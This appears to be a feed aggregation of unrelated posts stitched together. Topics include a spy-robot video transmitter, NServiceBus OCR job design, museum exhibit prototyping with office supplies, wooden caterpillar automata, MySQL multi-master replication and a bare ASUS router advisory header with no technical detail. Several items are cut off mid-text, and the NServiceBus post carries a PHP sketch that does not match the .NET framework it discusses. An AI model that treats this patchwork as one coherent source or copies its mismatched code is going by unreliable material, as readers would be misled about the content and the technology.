I originally made my own small video transmitter but it lacked audio and was very unstable as the robot moved around or when the batteries began to drain. This video transmitter is the output block of a small security camera reduced to its absolute minimal components, allowing it to send 900MHz audio and video back to a down converter. The small transmitter was very stable for several hundred feet, had very clear audio, and ran just fine from any DC power source from 6 volts to 12 volts. Having the video transmitter on a high frequency band will also help stop interference between it and the drive remote controller, which operates on the low 49MHz band.


Figure 2 - This is a tiny half inch square audio and video transmitter


It was very difficult to find a suitable micro video camera in 2004 for this project. The camera had to be black and white for use with the invisible infrared night vision LEDs, have a CCD imager rather than CMOS for clarity, and also output a standard NTSC composite signal rather than a serial bit stream. I eventually found this extremely small high resolution black and white composite camera and did a little hacking in order to remove the onboard power supply, which was 4x the size of the actual camera. This camera was perfect for this spybot now that it was reduced to only 1/4 inch square and able to run from 8 to 12 volts DC power.

Figure 3 - A micro sized NTSC composite video camera with low lux CCD

<< More on this and other DIY electronics projects: http://www.lucidscience.com/gal-showall.aspx >>



          2016 Stop Motion DEMO REEL        
I put together a demo reel showcasing my work in recent years. It's been a while since I've done this and it's kind of cool to be able to see all the various styles edited together in one video! Special shout out to my favorite composer John Dixon for The Inventor proof of concept score I'm using here. It's really awesome to be able to hear this isolated from the sound design of the trailer. So, I suggest watching the animated reel then going back and rewatching with your eyes closed to fully immerse yourself in the sound. Check out his other work here: www.manybirthdays.net Oh and hire me if you need fantastic animation!
Eric Power: 2016 DEMO REEL (Stop Motion Animator) from Eric Power on Vimeo.
          Raytheon demos high-definition, two-color 3rd Generation FLIR System        
REDSTONE ARSENAL, Ala. -  Raytheon Company's (NYSE: RTN) 3rd Generation Forward Looking Infrared (3rd Gen FLIR) Improved Target Acquisition System (ITAS) and fire control successfully achieved proof of concept in a series of laboratory and field tests. Preliminary evaluation of the impact of firing all versions of the TOW missile was also performed. "Raytheon's FLIR improvement program provides warfighters with better clarity at all ranges, allowing them to identify targets and differentiate between c...
          P7: Oxford Mosaic – A Web Publishing Platform for the Future        

P7: Oxford Mosaic – A Web Publishing Platform for the Future at IWMW 2017

IT Services at the University of Oxford has spent the last two years building a centralised web publishing platform.  This project started as a small proof of concept to prove demand, and grew into a fully-fledged multitenancy (not multi-site!) Drupal implementation hosted in the cloud with Acquia.

This project had to contend with several firsts, including: first project for a newly formed web team, first agile project for the team members, first software development to use automated deployment and testing, first home grown application to be hosted in the cloud, first project to be funded through incremental investment. At the same time, the project also encountered some familiar challenges, notably the governance framework for delivering a highly accessible SaaS platform in a 900 year-old University comprising many institutions and organisational layers.

The service has now been launched and we already have well over 50 sites built on our platform. We also have an ambitious roadmap with several significant architectural changes on the horizon to continue to evolve the platform.

Video: Session Video (youtube.com)

Sketch notes: IWMW17 Ruth Mason, Matthew Castle · mearso (mearso.co.uk)


          The case of NServiceBus long running jobs: OCR Processing.        

Designing systems using a message based architecture is awesome. Messages are a nice way to design human interactions and to model how different components in a domain interact with each other. Unfortunately, technology sometimes causes more headaches than needed. And when it comes to messaging, long running jobs are an interesting headache to deal with.

OCR Processing

Let’s say that our users need to process images and extract text using an optical character recognition system (OCR). This is done via a web interface that allows users to upload images for processing.

Image processing takes time and is done in the background; when processing is completed, users are notified that the results of their background jobs are ready to be consumed.

This process can be outlined as follows:


OCR processing can take a long time and we don’t want to hold the incoming user request until the work is completed. An interesting option is to offload the OCR work to a back-end system:

  1. User request is received by the web application
  2. Web application sends a message on a queue to a back-end processing system
  3. Back-end processing system processes the image
  4. When processing is done an event (again a message) is sent through the queuing system
  5. Web app reacts and notifies the user, e.g. via SignalR

Have we solved the issue?

Not really. Back-end processing cannot happen in the context of the incoming message: queuing systems have a concept of transactional processing that limits the time we have to handle the incoming message.

There are transactional queuing systems that have to respect transaction timeouts, and non-transactional queuing systems based on peek-and-lock (or similar) concepts, meaning that a message, once picked up by a processor, is locked for a certain amount of time and then released back to the queue if processing doesn’t finish in that timeframe.

In such a scenario, increasing the transaction, or lock, timeout is not a solution. It’s just a way to postpone the problem to a later time.

The state machine and the processor

A closer look at the business problem shows that there are two different business concerns being mixed together:

  • the need to keep track of the state of processing jobs using a state machine:
    • Job started
    • Job in progress
    • Job failed for a known reason
    • Job failed for an unknown reason
    • Job completed successfully
  • the OCR processing work

NServiceBus Sagas are a perfect fit for the state machine. As mentioned before, due to the transactional behavior of queuing systems, messages are not a good fit when it comes to long processing times.


The backend is now split to handle the two concerns. Obviously, the communication between the OCR state machine and the OCR worker process cannot be queue based.
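To make the split concrete, here is a minimal sketch of the state-machine half, written in PHP purely as an illustration (NServiceBus sagas are .NET classes, and the class and method names below are invented for this sketch). The point is that the saga only records where a job is in its lifecycle; the actual OCR work lives in the separate worker process.

<?php
// Illustrative sketch only: a bare-bones "saga" that tracks job state and nothing else.
class OcrJobStateMachine
{
    const STARTED        = 'started';
    const IN_PROGRESS    = 'in progress';
    const FAILED_KNOWN   = 'failed (known reason)';
    const FAILED_UNKNOWN = 'failed (unknown reason)';
    const COMPLETED      = 'completed';

    private $jobId;
    private $state;

    public function __construct($jobId)
    {
        $this->jobId = $jobId;
        $this->state = self::STARTED;
    }

    // Called when the worker reports progress over the non-queue channel (WCF in the PoC).
    public function markInProgress()
    {
        $this->state = self::IN_PROGRESS;
    }

    // Called when the worker reports completion; a real saga would now publish an event
    // back onto the queue so the web application can notify the user (e.g. via SignalR).
    public function markCompleted()
    {
        $this->state = self::COMPLETED;
    }

    public function currentState()
    {
        return $this->state;
    }
}
?>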

Conclusions

Using the above scenario I put together a proof of concept that shows how it can be implemented. It’s available on my GitHub account in the NServiceBus.POCs.OCRProcessing repository. This sample uses WCF to allow the OCR state machine and the OCR worker process to talk to each other.

There is also an official sample showing how to design the same processing logic using Azure ServiceBus in the NServiceBus documentation.


          Helix Nebula: from Grid to Cloud and Lessons Learned So Far        

European cloud computing is taking off as can be seen in the progress of Helix Nebula. The major pan-European cloud project announced last week that they were moving from the initial proof of concept phase to the start of the two-year pilot phase, which involves expanded proofs of concept and perhaps some additional demand side partners. Just a few months into the project, the participants discuss the challenges of migrating science into the cloud.



          Full Duplex in Action at CableLabs 2017 Summer Conference        
For the first time in the United States, we’ll be hosting our Full Duplex (FDX) DOCSIS proof of concept with Intel at the CableLabs Summer Conference this week. We unveiled the demo this past May at ANGA.
          IllumiRoom – Coming to an Xbox Near You?        

CES News: For a company with no official presence at CES this year, Microsoft still seems to be generating a fair amount of CES buzz for itself. First came a surprise appearance by none other than Steve Ballmer during Monday’s Qualcomm pre-show keynote, and now, an interesting proof of concept …


          Add "Office Supply Ninja" to Your Exhibit Prototyping Resume        

Thomas Edison said,  "To invent, you need a good imagination and a pile of junk."  His reference was to inventing, but he could have also been speaking about prototyping.

To me, prototyping is an iterative process that uses simple materials to help you answer questions about the physical aspects of your exhibit components (even labels!) early on in the development process.  

As I mentioned in a previous post, it's always a bit discouraging to hear museum folks say "we just don't have the time/the money/the space/the materials to do prototyping ..."  (By then I'm usually thinking "So how is putting an ill-conceived or malfunctioning exhibit component into your museum, because you didn't prototype, saving time or money?"  But I digress...)

Maybe it's just me, but I can't imagine anyone fabricating an exhibit component without trying out a quick-and-dirty version first.  So in today's post I thought I'd lay out the simple steps I use to show how quickly and inexpensively prototyping can be integrated into the beginning of any exhibit development process, and how you too can become an Office Supply Ninja!


STEP ONE:  Figure out what you want to find out.

In this case, a client wanted me to come up with an interactive version of a "Food Web" (the complex interrelationship of organisms in a particular environment, showing, basically, what eats what.)  We brainstormed a number of approaches (magnet board, touch screen computer) but finally settled on the notion of allowing visitors to construct a "Food Web Mobile" with the elements being the various organisms found (in this particular case) in a mangrove swamp.  The client was also able to provide me with a flow chart showing the relationships between organisms and a floor plan of the area where the final exhibit will be installed.

The two initial things I wanted to test or find out about from my prototype were:

1) Did people "get" the idea conceptually?  That is, did they understand the relationships and analogies between the Food Web Mobile and the actual organisms in the swamp?

2) Could they easily create different sorts of physical arrangements with the mobile that were interesting and accurate?


STEP TWO: Get out your junk!



As in the Edison quote above, it helps to have a good supply of "bits and bobs" around to prototype with.  You might not have the same sorts of junk that I've gathered up over years in the museum exhibit racket, but everyone should have access to basic office supplies (stuff like paper, tape, markers, index cards, scissors, etc.)  And really that's all you need to start assembling prototypes. (The imagination part is important, too.)


STEP THREE: Start playing around with the pieces ...


Before I even start assembling a complete rough mechanism or system I like to gather all the parts together and see if I like how they work with each other. In the case of the Food Web Mobile prototype, I used colored file folders to represent different levels of organisms. I initially made each color/level out of the same size pieces, but then I changed to having each color be a different size. Finally, I used a hole punch to make the holes, and bent paper clips to serve as the hooks that would allow users to connect the pieces/organisms in different ways.


STEP FOUR:  Assemble, then iterate, iterate, iterate!


This is the part of the prototyping process that requires other people besides yourself. Let your kids, your co-workers, your significant other, whoever (as long as it's somebody besides yourself) try out your idea. Obviously the closer your "testers" are to the expected demographic inside the museum, the better --- ideally I like to prototype somewhere inside the museum itself.

Resist the urge to explain or over-explain your prototype.  Just watch what people do (or don't do!) with the exhibit component(s).  Take lots of notes/pictures/video.  Then take a break to change your prototype based on what you've observed and heard, and try it out again.  That's called iteration.

In this case, I saw right away that the mobile spun and balanced in interesting ways, but that meant that the labels would need to be printed on both sides of the pieces.  Fortunately, my three "in-house testers" (ages 6, 11, and 13) seemed to "get" the concept of "Food Webs" embedded into the Mobile interactive, and started coming up with interesting physical variations on their own.

For example, I initially imagined people would just try to create "balanced" arrangements of pieces on the Mobile.  But, as you can see below, the prototype testers enjoyed making "unbalanced" arrangements as well (which is fine, and makes sense conceptually as well.)   Also, we discovered that people realized that they could hang more than one "organism piece" on the lower hooks (which was also fine, and also made sense conceptually.)



STEP FIVE: Figure out what's next ... even if it's the trash can!

Do you need to change the label, or some physical arrangement of your prototype?  Using simple, inexpensive materials makes that easy.

Do you just need to junk this prototype idea?  Using simple, inexpensive materials makes it easier to move on to a new idea, too. (Much more easily than if you had spent weeks crafting and assembling something out of expensive materials from your workshop...)  It's not too surprising to see people really struggle to let a bad exhibit idea go, especially if they've spent several weeks putting it together. Quick and cheap should be your watchwords early on in the prototyping process.

In this case, I sent photos of the paper clip prototype and a short video showing people using the Food Web Mobile to the client as a "proof of concept."  They were quite pleased, and so now I will make a second-level prototype using materials more like those I expect to use in the "final" exhibit (which I'll update in a future post.)  Even so, I will still repeat the steps above of gathering materials, assembling pieces, and iterating through different versions with visitors. 

I hope you'll give this "office supply ninja" version of exhibit prototyping a try for your next project!

If you do, send me an email and I'd be happy to show off the results of ExhibiTricks readers' prototyping efforts.


          Base X: The Isle of Anthrax        
Requisitioned from farmers, blitzed with anthrax-laden bombs in the 1940s, and made inhospitable to human and animal life for decades, the tiny Scottish island of Gruinard now serves as home to a flock of healthy sheep and a disreputable monument to the birth of biological warfare. The research conducted at Gruinard during the second World War was the very first of its kind, providing proof of concept of a natural microorganism that could be massively weaponized to inflict environmental damage a
          Having Trouble with Your IoT Project?        

Are you having problems with trying to incorporate Internet of Things technology into your new product? According to a new survey from Cisco, you’re not alone.

Projections from Gartner show IoT technology reaching more than 20 billion devices by 2020, while IDC predicts there will be 82 billion IoT endpoints by 2025.

Yet Cisco’s study – released last month at the IoT World Forum – found that 60 percent of IoT projects flounder at the proof of concept phase. Only 26 percent of companies said they had an IoT project they considered a total success. Worse still, one third of all finished projects were considered failures.

“It’s not for lack of trying,” Rowan Trollope, Cisco’s general manager for IoT, said during the forum. “But there are plenty of things we can do to get more projects out of pilot and to complete success and that’s what we’re here in London to do.”


          Eclipse Foundation announces expanded support for Eclipse Integration Platform        
Eclipse Foundation today announced new partnerships that strengthen the Eclipse Application Lifecycle Framework (ALF) Project and has made the new proof of concept code available for download; it will be demonstrated at EclipseCon 2006. The ALF Project, initiated by Serena Software in the spring of 2005, addresses the universal problem of integrating Application Lifecycle Management (ALM) technologies so that they provide full interoperability. Currently more than thirty vendors have pledged support for the ALF project and momentum continues. Recent additions to the list of those committing resources include AccuRev, PlanView and Viewtier.
          Making a Toy Caterpillar Automata        

This is a toy that looks complicated and seems like it demands real precision to work at all but honestly, it's pretty straight forward and there is a bit of wiggle room in the measurements. (Wiggle... caterpillar... never mind.)

The toy came together over several weekends of trial and error. Hubris and the occasional flying disk o' death off of the miter saw delayed me but I'm fairly confident that one of these could be made (but maybe not painted) in a day without too much grief.

So to begin at the beginning...

A few years ago I made my first caterpillar automata.  Ultimately, I  called it "The Very Hungry Caterpillar That Photographed Very Poorly." It was a gift for one of my nieces and it is still working today.




It had just six cams and I used five large beads for the body and a "doll's head" for, well, the head. There was nothing to prevent the body parts from rotating on their shafts, but that was fine.

I didn't have a set of plans for that one. It was just a proof of concept that became a finished toy. That was the same approach I took with this one; build and test as I went along.

I needed to make a toy for little one's school auction and for a friend's newborn. I wanted to try my hand with some more automata and I recently came across Woody Mammoth's version of a caterpillar toy on the web. I really liked the look of his, so it seemed like the way to go.

So... for those following along at home; here is Cam Terminology 101:
The cam is attached to a rod that runs through the pivot point. When the rod is rotated, the cam turns, pushing the follower up through the slide and then allowing it to fall as it continues to turn. So rotary motion gets turned into reciprocating motion. The follower is aligned over the pivot point and is always in contact with the cam.

Now on to the build.


The cams were cut from 1 1/4" pine dowel on the miter saw and are exactly 1/2" wide. They need 1/4" holes drilled all the way through their face. I used a jig that I usually use to drill offset holes in wooden wheels. The center of the hole is 5/16" from the edge.

I used a pine dowel for these. One batch seemed to have rougher edges that splintered a bit but a lot of factors can go into that. They cleaned up fine.

The case for the caterpillar was made with 1x3 (3/4" by 2 1/2" actual) pine boards. The case was 8 1/2" long (8" is fine as well). The holes on the top piece need to be right down the center and I used a 9/32" bit to allow clearance for the 1/4 dowels that will be the followers. I drilled the hole for the head at 2" in from the end and the first hole for the body at 2 3/4". After that, it was 8 more holes each 1/2" from the last one. ( I finally got smart and set up a template for this.)

The front and back pieces were 3" tall. They have a 9/32" hole right through their very center and need to line up since the rod needs to go through both holes.

Once the holes were done I glued one end to the front of the top and the other to the back of the bottom to make two "L" shaped pieces. I put a coat of beeswax and mineral oil on them but was careful not to get any on the surfaces that will need glue during final assembly.

The followers are 2 1/2" long pieces of 1/4" oak dowels (I needed to make 10 of these.) The bases of the followers were little pine blocks I cut that were 1" long (left to right looking from the front of the finished toy), 1/2" tall (up and down) and about 7/16" thick (front to back.) They each have a 1/4" flat bottomed hole drilled in them about 1/4" deep (using a Forstner bit.) I found that drilling the holes on either end of the stick already cut for thickness and height and then cutting to length on the band saw was much safer than cutting it to final size and trying to drill the holes.

I glued the followers together with their bases and checked that they moved freely in the holes on the top of the case. I hit the holes with a rat tail file to make sure nothing was too tight.

I took a 10" or 12" piece of 1/4" oak dowel and did a quick test to see where I could start safely lining up the cams. I glued the first one in place and then it was just a matter of lining up the next cam so it was a little off line from the previous one but glued to each other. (I had a 1/4" difference in the rotation for each one.) The less the difference, the smoother the action. When finished it looks like a screw. I did double up on the cams for the head. I matched them for this one. On the other one I just cut one dowel 1" thick instead of 1/2" and drilled the offset hole in it. The thin disk at the front is used to help lock the rod in place so it doesn't move too far back and forth once the crank is attached.

So then there is some test fitting to see where that locking disk needs to be placed to have the followers line up with the cams. By having the bases of the followers be a little less than 1/2" wide and the cams exactly 1/2" wide, it makes it run pretty smoothly. I hit a few of the "feet" of the followers on the belt sander once or twice just to give a little more room. Once I was happy with the alignment, I glued the locking disk in place and the top and the bottom together.

Now for the body...

I purchased a 1 1/4" diameter poplar dowel from the local old school hardware store. I used it for the 7 main body segments. I also cut one disk each from a 1 1/8" and a 1" dowel for segments toward the tail. Each segment needs to be just short of 1/2" thick. The poplar dowel splintered a lot less than the same sized pine dowel I used for the cams and had a smoother, denser end grain after it was cut and sanded.

I experimented with using my band saw to cut the disks and I was very disappointed with the results. They weren't a total wreck but they required a fair amount of time on the belt sander to clean up and they were uneven. After a little slip cost me a part of a fingernail, I finally was like "Not worth it!" I cut a new set using my power miter saw with a stop block. Super easy and super precise. One note though... DO NOT lift the blade while it is still spinning! I spit three of those little disks across that shop at about Mach 4 before I learned that lesson.

The body segments need a 1/4" hole drilled in the center of their edge for the followers. I used the same jig as for the cams but turned up on its side. I used a Forstner bit (thank you once again Benjamin Forstner) to get a nice flat bottomed hole. I made the holes 3/8" deep. You could probably make this with 3/16" dowels but I find the birch dowels I get in that size to be pretty fragile. Your mileage may vary.


I used a pre-turned craft store piece called a "doll's head" for the caterpillar's head. (It is 35mm across, about 1 7/16"ish.) I plugged the hole of what would normally have been its base with a length of 3/16" dowel and then drilled a 1/4" hole for a follower to fit in. I used the same jig as with the other pieces and left the dowel long so I could use it as a handle while drilling. Once the hole for the follower was done, I trimmed the dowel flush and sanded that part flat.

The smart thing to do now is to test your body segments to make sure they don't rub against each other too much AND THEN paint and finish them even though they will be slightly thicker once painted. Just be sure to keep the segments in the same order you test fitted them. 1/16" one way or the other really makes a difference. You don't want too much wiggle room between the pieces though since it can allow the followers to get out of alignment and interfere with each other. Don't let this stress you out. It's a toy. Not the engine on an airplane. It will work fine.

So, with all the pieces cut and tested, I painted them and gave them a coat of spray acrylic. Yeah... it looked a little creepy but this setup let me paint the full disks and have them dry out of the way. Also let me use the spray acrylic on both sides at the same time. It was a big time saver.

One thing I added before the acrylic was a shapely rear end for the caterpillar. He just didn't look right with a round head and flat butt so I rounded off a 3/4" dowel, painted and glued it on to the 1" body segment. Now... baby got back!


Last thing is the crank. I used a 2" hole saw to cut a disk of 1/2" pine from a board, sanded it up and painted it to look like an orange. A little 1/4" dowel became the stem/handle for the crank. It goes in the 1/4" hole where the leaves are.

I tested the fit again and then glued the body pieces onto the followers. Almost done.
I trimmed the front and back of the rod and added the handle. I left a tiny bit over 1/2" of the rod protruding from the front to attach the crank on it. I made sure to leave a little space so it wasn't constantly hitting the case. I guess a washer is called for here, but I tend to stay away from metal in the toys if I can help it.

Okay then.. all set.


Crank
Head
The full critter


And here he is in action. I did the cams slightly differently on this one with an extended cam in the tail (not needed) and a longer cam for the head that worked as the locking piece as well.


My guess is that most parents of the last 40 or so years are familiar with Eric Carle's "The Very Hungry Caterpillar." It's a great book and it has a very distinctive style. I could never match it but I figured I could capture the vibe by using some of the same colors and shapes.

People really like the pleasant wiggle and whimsical nature of this toy. It has really whetted my appetite for simple automata. Stay tuned.
          My Island of Misfit (Prototype) Toys        
Charlie in the Box – “My name is all wrong. No child wants to play with a Charlie-In-The-Box, so I had to come here.”
Hermey – “Where's ‘here’?”

We're on the island of misfit toys…

Yes. His name is Hermey. Not Herbie. He was a gift from a friend last Christmas and now he hangs out and watches over my shop. True, he turned his back on his toy-making heritage to study dentistry, but while you can take the elf out of the shop... you never can really take the shop out of the elf.

Speaking of my shop... I knew it was time to clean my shop when there was no place for my cat to sit when I was trying to work. I could see that he was getting quite frustrated at not being able to get in my way or use his "Purr-Rays" to hypnotize me into doing whatever he wants. In fact, it may have been his idea for me to start cleaning up.

For years I had been in the habit of holding on to every little scrap of wood or doo-dad I had worked on. In a bit of irony, now that I have a bunch of space for good stuff, I really don't have space for a bunch of junk. For the first time I could remember I started throwing stuff out or putting it into the "burn bucket" for our fire-pit.

But before I clean, let me digress....

The sources for my toys are pretty varied. I get an awful lot of plans from books and more than a few ideas off the interwebs. Sometimes they are a mix and match where I change a plan just a little to match my tastes/interests or to make it special for the person receiving the toy. Sometimes though, I just get an idea and tinker with it a bit and see where it takes me.

Ideas like the WW1 British and German tanks, this dump truck and the bomb sight were proofs of concept (proof of concepts?) that just kept going until I had a finished product. However, in cleaning up my space I was surprised at all the prototypes and near misses that I had held on to.

Which (finally) leads us to The Island of Misfit (Prototype) Toys.

I was surprised that I had held on to so many of these, but while some did head for the burn box, a lot of these went back on the shelf or in a box.

This bulldozer was  based on David Wakefield's idea in "How to Make Animated Toys"
I got distracted working out how to make a little driver bounce up and down and never got back to finishing this. The blade was too clumsy anyway. Some day.

Torpedo launcher. When I was a kid my buddy Jack had this plastic naval play-set where torpedoes fired out of the subs. It was pretty cool and it was the inspiration for this. You push the torpedo down the bow tube and it pushes in a plunger that is then locked by upward pressure on the conning tower/periscope. (There is a spring at the rear of the plunger.) Once locked, just push down on the periscope and the torpedo launches. I turned the torpedo on a mini lathe and it would actually shoot several feet. It worked well but I didn't like burying working parts where I couldn't get at them if they needed to be fixed. Proportions are wrong as well unless I was building a mini-sub... hey....that's not a bad idea!

A tank turret where the main gun recoils thanks to a Scotch Yoke. Basically rotational motion is converted to linear motion. The neat thing is this should allow me to rotate the turret and the gun would reciprocate no matter which direction it faced. Pretty cool, huh? Actually needs to be built to a much higher tolerance and the turret would have to be pretty snug in its ring to prevent it from rotating by itself. Still, an idea that I should revisit.

Hard to tell from this picture.... but yes, I was working on a Katyusha rocket launcher. For the non-History Channel types reading this, the Katyusha is a Soviet truck mounted rocket launcher used most famously in the Second World War (or... if any readers are actually coming from those Russian sites showing in my stats... The Great Patriotic War.) The idea was to pick up a $1 craft store truck and build a rocket launcher on it that really worked because for some reason it sounded exactly like something I would do. Tiny rubber bands provide the force. You pull back on the block, the little dowels retract, you let go of the block, the dowels fly forward and that sends little dowel rockets flying towards entrenched German invaders. Or not. It just didn't work very well. I can still build the truck though.

This one is hard to imagine but the idea is a sort of Gatling gun that shoots soda caps. You're looking at part of the feed mechanism. Seriously. Caps fall down a tube, are pulled to the side, drop down and are fired. The feed pulls back, grabs another cap, and the cycle is repeated. Sorta worked but was going to be too big. I need to revisit it with realistic dimensions. Perhaps the world isn't ready for an automatic bottle cap launcher anyway.




Okay, now on to the Hall of Failed Ramp Walkers.

I love ramp walkers. They are neat gravity folk toys that are just amazing. These toys seem to walk down a ramp on their own. No batteries, springs or rubber bands. Just some physics and woodworking. Actually, they are hard to get just right. It is a mix of balance, friction, gravity, etc. that has to be just right or the toy will slide or stop walking halfway down the ramp. I've managed to build two successful styles of ramp walkers. You can view the videos of a rhino unicorn and the kangaroo pictured on the left.

The Unicorn is based on Lou Ma's ramp walking rhino plan with some cosmetic changes. (That link leads to Dug North's amazing Automata Blog. You should check it out.)

I've actually made four of the kangaroos. The plans came from Wombat Morrison's Instructable. It is a great plan. It works every time.

Anyway.... For the two that worked, there are four that didn't. Here was my first ramp walker attempt: a duck. Somewhere I have a very poor quality cell phone video of it walking down a ramp. Since I had to tape assorted washers and nickels to its rear end to make it walk, I knew that it wasn't right. One of my daughters has a duck "thing" so I will get it right at some point.

I wanted to make the unicorn based on a horse but I couldn't find a pattern. I'd seen plastic ones that used to be used as cereal premiums but not a wood one. I gave this a shot to try and work out the mechanics. Needless to say... it didn't work.

So I decided that what I needed was a more flexible prototype model. Something I could try multiple variations on until I got it right. So I tried this piece of modern day engineering and much to my surprise... it didn't work.

After I had built several kangaroos and the rhino, I got a better sense for how the ramp walkers need to work. I decided to try my hand at designing something from scratch. I applied all my new found expertise and put it into this prototype ramp walking gorilla and surprisingly enough... it didn't work. Close though... he will be revisited.

Last of the non-working ramp walkers is this bird based on one of Lou Ma's designs. I simply couldn't get it to work properly. I think he is salvageable but not a high priority. He (she?) has been spared from the burn bucket for the time being.






The entire time I was cleaning things, the cat was keeping tabs on me. As each little space was cleared, he'd claim it as his own and command me to do his bidding. I had no choice but to obey.

The last two prototypes are still under development. The first is a string climbing orangutan. Again, it is based on a Lou Ma idea but modified by me. This guy works, but not as smoothly as I would want. Arms are too angular to look natural but there is still hope for him. He'll  live on the Kennedy Assassination shelf for the time being.

And now, the latest prototype/proof of concept. I've seen plans for railroad hand truck toys where men on each side pump the handles up and down. Pretty cool but what if instead of people, it was penguins?!!! I know! Crazy cool huh? Got the idea from a grocery store display. Anyway, it works. I need to make convincing penguins and use the measurements I figured out on this to make a real one.



Teddy and Hermey supervised me through to the end. On the table under them you can see a partially completed frog who is actually on top of ANOTHER prototype piece: the Spinosaurus that I started five years ago and shelved.

In a perfect world, I would have closed this post with a picture of my clean shop but.... well it was clean for a day or two and then I re-clutterfied it. I guess it shows that I'm at least using the space... just saying.






          Ubuntu's Logo Spotted in The Big Bang Theory ... And What I've Been Up to Lately         
This is a quick account of my recent activities:

1.  I saw Ubuntu's logo in an episode of the show The Big Bang Theory.

That was on episode 17 of the 10th season.  Actor Kevin Sussman, who gives life to the character Stuart Bloom, is wearing a grey Ubuntu T-Shirt.




2.  I upgraded from Yakkety Yak to Zesty Zapus.

The only time I attempted to upgrade an Ubuntu version was on my Chromebook, and it did not work.  Thus, I had my concerns when I did it on my ThinkPenguin Adelie laptop, which is the machine I take to work.  My fears proved unfounded, though: everything went perfectly!  Wow!

3.  I experimented with Debian on my Lenovo tablet.

I had tried GNURoot before and it went pretty well, but everything felt more like a proof of concept. Thus, I tried Debian noroot this time. I still cannot get VLC to work, but LibreOffice does run smoothly, and that was one of my priorities. I'll keep testing.
          Proof of Concept Funding        

Last updated: 11:47, Wed 29 Mar 2017 by Beck Lockwood



          Senior Java Software Engineer        
Senior Java Software Engineer - Computer programming

Our client is looking to recruit a Senior Java Software Engineer to help in the creation of innovative payment technologies that will revolutionise the payments industry.

Forming part of one of their development teams and working closely with the team lead and the technical architects, you will be involved in the design, development, testing and maintenance of payment products as well as in the training and mentoring of junior team members. As part of the role, you will be required to keep up to date with the latest trends and technologies, and see how these can be best used in our projects. If you are looking to work in a fun, challenging, fast-paced environment with ample opportunities for growth, this role might just be for you.

 
Responsibilities

  • Translate high level business requirements into system design within the existing system architecture
  • Ensure high quality in deliverables and continuous improvement within area of responsibility
  • Develop, test and maintain Java code as dictated by project requirements
  • Create and maintain software documentation
  • Work with and mentor junior team members
  • Construct Proof of Concepts and assess their viability
  • Evaluate and provide feedback on available and emerging technologies to determine the potential impacts and business value

Requirements:

  • A Computer Science degree or equivalent
  • 5+ years’ experience in an application development role, with proven track record of delivery
  • Demonstrated in depth expertise with Java, Java Frameworks, Spring, Hibernate, Object-Oriented design, and development principles
  • Moderate experience in building web applications using  HTML, CSS, JavaScript and  JavaScript frameworks, preferably AngularJS
  • Excellent personal organisation and ability to prioritise and carry out multiple tasks
  • Must be flexible and able to adapt to change in a fast-paced work environment
  • Working experience in Agile projects, preferably using Scrum/XP practices
  • Demonstrated ability to balance scope and quality against time to market in a minimum viable product whilst working towards the right level of quality in the final product
    Job type:
    Full-time
    Salary notes: Depends on experience

          MySQL Multi-Master – Single-Slave – Replication (Episode 2)        
Introduction

One of the features that makes MySQL so great is its easy replication set-up. If you are experienced and know how to do it, it takes you about 15 minutes to set up a slave. What you have in the end is a replication from one master to one or several slaves. So you can build a top-down data stream pyramid and spread your data over many slaves.


From time to time customers ask for the other way around: many masters replicating to one slave (which is also called multi-source replication). For this requirement, MySQL replication cannot help you directly.

Possibilities

You can circumvent this situation in the following ways:

  1. Implement your own data transfer mechanism.

  2. Use this ugly hack I wrote down 2 years ago: Multi-Master-Single-Slave-Replication

  3. Test the approach described in the following article.

  4. Wait until MySQL has implemented it...


Possibility number 4 would be the nicest one, because then the solution would be properly supported by your database vendor and you would not have to worry much about problems, as long as you have a support contract.

When we look at the MySQL work log and search for replication we find a work log entry with the title: WL#1697: Multi-source replication. But for whatever reason it has the following status: Affects: Server-7.0 — Status: On-Hold — Priority: Low. :-(

What can we do now:
a) Resign.
b) Become an important customer (by paying much money), complain about the priority and if nothing changes escalate it to the top management of MySQL.
c) Find many, many other fellow sufferers, unite and make your database vendor's management aware of your desire.
d) Help yourself (it is, after all, an Open Source product...).

Possibilities number 1 to 3 from above are some kind of Help yourself.

Help yourself

Because I am not a programmer and I have no clue about programming, possibility number 1 is out of the question for me. But I am sure there are many other MySQL users out there in the world who would appreciate your effort.
Possibility number 2 is a quick and ugly hack but may work in some situations.
And number 3 was pointed out to me by a user called Kwame, who wrote me an email (thanks, Kwame, for the cool hint!).

A possible solution

One and a half years ago I wrote a little article about "MySQL Active - Active Clustering" because we had customers asking again and again for a replacement for a well-known but very expensive product from another big database vendor.
Peter Zaitsev was not very happy with its content: MySQL MyISAM Active Active Clustering - looking for trouble?. But the comments on that critique already hinted at the solution: when you combine MySQL Active-Active Clustering with MySQL replication, you can finally get a many-master single-slave replication!

So what I did was the following:

I have 3 servers which act as masters, and on the 4th server I install 3 MySQL instances (mysqld) running on the same datadir. Please make sure that you replicate ONLY ONE SCHEMA per master-slave pair!


As the configuration file for my slave instances I used something like this:

#
# my.cnf
#

[mysqld]

port = 3308
socket = /home/mysql/tmp/mysql-3308.sock
pid-file = /home/mysql/data/mysqld5127/mysql-3308.pid
datadir = /home/mysql/data/mysqld5127

skip-innodb
external-locking
log-error = /home/mysql/data/mysqld5127/error_4.log

server_id = 4
master-info-file = /home/mysql/data/mysqld5127/master.info
relay-log = /home/mysql/data/mysqld5127/mysql-3308-relay-bin
relay-log-index = /home/mysql/data/mysqld5127/mysql-3308-relay-bin
relay-log-info-file = /home/mysql/data/mysqld5127/relay-log.info
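One possible addition, not shown in the set-up above, is to make the one-schema-per-pair rule explicit with a replication filter on each slave instance (the schema names match the requirements below), for example:

# only for the slave instance replicating master 1
replicate-do-db = schema_a

The other two instances would get schema_b and schema_c respectively. Keep in mind that replicate-do-db filters on the default database when statement-based replication is used, so treat it as a safety net on top of the requirements below, not as a replacement for them.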

Requirements

Make sure that:

  • You only write to one schema per master (schema_a in master 1, schema_b in master 2 and so on...)

  • You comply with all the requirements described in the document MySQL Active - Active Clustering

  • You flush the tables on ALL slave instances before reading.


Very simple first tests showed that it is possible to "aggregate" the data from many masters into a single slave. But please verify this proof of concept very carefully before you deploy it to your production system with your real data. This approach is neither recommended nor supported by MySQL.

Drawback

A further replication from this slave system to other slaves is not possible (or at least no feasible solution comes to my mind) unless you use MySQL Cluster as an "aggregator". Then it could be possible...
          Multiple vulnerabilities affecting several ASUS Routers        
Written by Eldar Marcussen

Affected Vendor: ASUS http://www.asus.com/au/Networking/Wireless-Routers-Products/
Affected Device: Multiple - including: RT-AC3200
Affected Version: Multiple - including: 3.0.0.4.378_7838
Issue type: Multiple Vulnerabilities
